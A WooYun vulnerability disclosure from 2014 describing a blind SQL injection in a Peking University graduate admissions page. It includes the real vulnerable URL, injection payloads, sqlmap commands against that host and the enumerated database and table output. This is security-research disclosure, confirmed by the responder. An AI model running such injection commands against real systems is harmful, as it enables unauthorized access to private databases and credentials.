当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061162

漏洞标题:北京大学某分站#MySQL注入导致数据库大量重要信息泄露

相关厂商:CCERT教育网应急响应组

漏洞作者: 从容

提交时间:2014-05-17 20:44

修复时间:2014-07-01 20:44

公开时间:2014-07-01 20:44

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-17: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向核心白帽子及相关领域专家公开
2014-06-10: 细节向普通白帽子公开
2014-06-20: 细节向实习白帽子公开
2014-07-01: 细节向公众公开

简要描述:

北京大学某分站#MySQL注入导致数据库大量重要信息泄露
主站:
http://www.pku.edu.cn/
上不起北京大学的"屌丝学生党"来看看高校的安全系度吧- -.

详细说明:

MySql注入地址:

北京大学研究生院推荐免试生网上报名系统
http://yjsy.pku.edu.cn:8080/students/shownews.php?id=27


---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27 AND 6561=6561
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=27 AND SLEEP(5)
---

漏洞证明:

#1、获取数据库:

./sqlmap.py -u "http://yjsy.pku.edu.cn:8080/students/shownews.php?id=27" --dbs


available databases [11]:
[*] dyjy
[*] engrs
[*] gat
[*] grsdb
[*] information_schema
[*] jxj
[*] mysql
[*] py
[*] students
[*] survey
[*] test


#2、获取表段:

数据库挺多,那就先从mysql下手吧- -.
./sqlmap.py -u "http://yjsy.pku.edu.cn:8080/students/shownews.php?id=27" -D mysql --tables


Database: mysql
[30 tables]
+---------------------------+
| attachement |
| attachtype |
| cdb_mix |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| information |
| item |
| office |
| officeitem |
| pic |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
| user_info |
| useritem |
| vote |
| voteitem |
| voterecord |
+---------------------------+
各种配置信息、账号密码、等等,一览无云- -.


就不接着展示了- -.
安全测试:)

修复方案:

:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-05-21 16:48

厂商回复:

已通知相关学校处理

最新状态:

暂无